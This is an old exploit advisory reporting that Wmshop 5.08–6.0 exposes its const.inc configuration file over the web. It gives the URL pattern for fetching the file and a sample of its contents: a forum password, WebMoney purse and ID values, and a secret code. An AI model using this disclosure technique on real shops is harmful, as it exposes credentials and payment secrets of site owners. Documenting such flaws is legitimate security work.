Wmshop versions 5.08 through 6.0 suffers from a forum password disclosure vulnerability.
89cb14e32960a3458fafac4dd59f0424e691ec4c65d6db751af09fb2539bb992
< ------------------- header data start ------------------- >
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
# Application Name : Wmshop 6.0 - 5.08
# Vulnerable Type : Arbitrary Forum Password Disclosure Vulnerability
# Infection : Forum Password Get...
# Author : Septemb0x
# Script Down.& WebSite : http://s2.dosya.tc/wmshop_6.0.rar.html - http://s2.dosya.tc/wmshop_5.08.rar.html - https://merchant.webmoney.ru/conf/purses.asp
### Cyber-Warrior & Security TIM - Bug Researchers Group ###
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
http://[target]/[path]/const.inc
GET TO;
<?
$serv_const_name="shop";
$serv_const_embox="support@shop.ru";
$serv_const_forum_pass="Gdssn6Fdgh";
$serv_const_title="Òîðãîâàÿ ïëîùàäêà ïî ïðîäàæå öèôðîâûõ òîâàðîâ";
$serv_const_servname="localhost";
$serv_const_commission="0.05";
$serv_const_lstcount="25";
$serv_const_lstrekom="20";
$serv_const_shopwmz="Z65656565665";
$serv_const_shopwmid="645634564556";
$serv_const_secretcod_wmid="gFdGdx2d5FGmJt5DevALJg6";
?>
< -- bug code end of -- >
# Greetz : BHDR & BARCOD3 & Cem & Asil Bey And All Friends...
_________________________________________________________________
Windows Live ile fotoðraflarýnýzý organize edebilir, düzenleyebilir ve paylaþabilirsiniz.
http://www.microsoft.com/turkiye/windows/windowslive/products/photo-gallery-edit.aspx